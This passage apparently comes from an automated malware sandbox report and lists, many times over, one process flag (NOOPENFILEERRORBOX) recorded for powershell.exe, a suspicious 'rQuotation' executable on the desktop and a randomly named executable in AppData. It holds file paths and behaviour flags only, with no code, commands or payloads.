                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess information set: NOOPENFILEERRORBOX
